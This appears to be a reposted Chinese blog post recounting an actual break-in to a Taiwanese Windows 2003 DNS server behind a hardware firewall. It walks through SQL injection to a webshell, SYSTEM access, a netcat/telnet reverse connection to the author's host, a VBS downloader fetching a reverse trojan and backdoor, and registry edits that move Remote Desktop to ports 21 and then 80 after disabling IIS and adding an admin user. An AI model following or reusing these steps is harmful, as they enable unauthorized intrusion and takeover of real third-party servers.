也想出现在这里? 联系我们

入侵藏在防火墙后面的机子

作者 : 小编 本文共1556个字,预计阅读时间需要4分钟 发布时间: 2021-06-14 共730人阅读
也想出现在这里? 联系我们

事情是这样的:
遭遇一台湾的dns服务器,win2003 server
扫描器报告的开放端口:21,53,80
ok,弄到一个sa权限的注射点,很爽得拿到一个webshell,透过sqlrootkit,俺就是system权限了.本以为对方菜到家了.谁知故事才刚刚开始.
ipconfig /all
不是内网机子,只有一个外网ip.ok
net start
terminal service开放
netstat -na
3389端口在的
保险期间:reg query "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" /v PortNumber
端口确实是3389
因为前面通过查看服务看到系统防火墙服务开启了,所以顺便
reg query "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections
查下是否防火墙屏蔽端口,结果是没有.
接着本地 nc -v -l -p 99
对方:telnet myip 99
等了一会没反应
嗯?连不到我? ping www.163.com 正常返回值
ping myip 由于我开着系统自带的防火墙,就用sniffer监听下数据,结果是对方能ping到我.怎么回事呢?
写了个vbs下载脚本上去,下载了个反弹的马试试,结果不上线(意料中)马是绝对安装成功的.安装端口复用的后门,成功安装,可依然连不上去
由于不能telnet 我本机监听的端口,端口转发行不通
难道是tcp/ip筛选?
regedit -e 导出了关于tcp/ip的几个位置,查看了下,值都是0,也就是没有配置IPSEC? 再次导出ip安全策略,下回本地,导入看了下,也是默认没有任何特殊配置软防?有可能.于是我tasklist 查看了进程,taskkill掉所有可疑的.(事实上我确实不能找到有软防存在的迹象) 翻遍了整个目录都没有踪迹.
最后的可能 硬防! 怎么突破呢? 我无法对硬防进行操作,只能在已经开放的端口上做文章了.于是 sc config msftpsvc start= disabled 把ftp服务禁用 导出终端服务关于端口配置的两处
regedit -e C:\\1.reg "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp"
regedit -e C:\\2.reg "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp"
修改为21的16进制值 15 ,regedit -s c:\\1.reg 这样导入两个改过的注册表文件,这样终端端口就变成21了.
shutdown -f -t 3 -r 3秒后强制重启服务器.
很快重启完成,netstat -na 3389没有了,21有.兴奋ing,谁知道,本地连接居然还是连不上去.想不明白,继续,配置个radmin,连接端口为21,先sc 禁用终端服务,重启后,安装radmin.结果是没有安装成功.
奇怪的是,我在radmin连接器里新建连接,端口指向21的时候显示21端口是open的,而通过sqlrootkit执行netstat -na 却看不到21端口存在.问题终于清楚了.
看来唯一能下手的只有 80了
ok,修改终端服务端口为80,sc禁用 iisadmin/w3svc/httpfilter 添加管理用户 重启服务器
1分钟不到,终于登上了可爱的终端.
进去的方式真可谓强暴了.

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 入侵藏在防火墙后面的机子

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录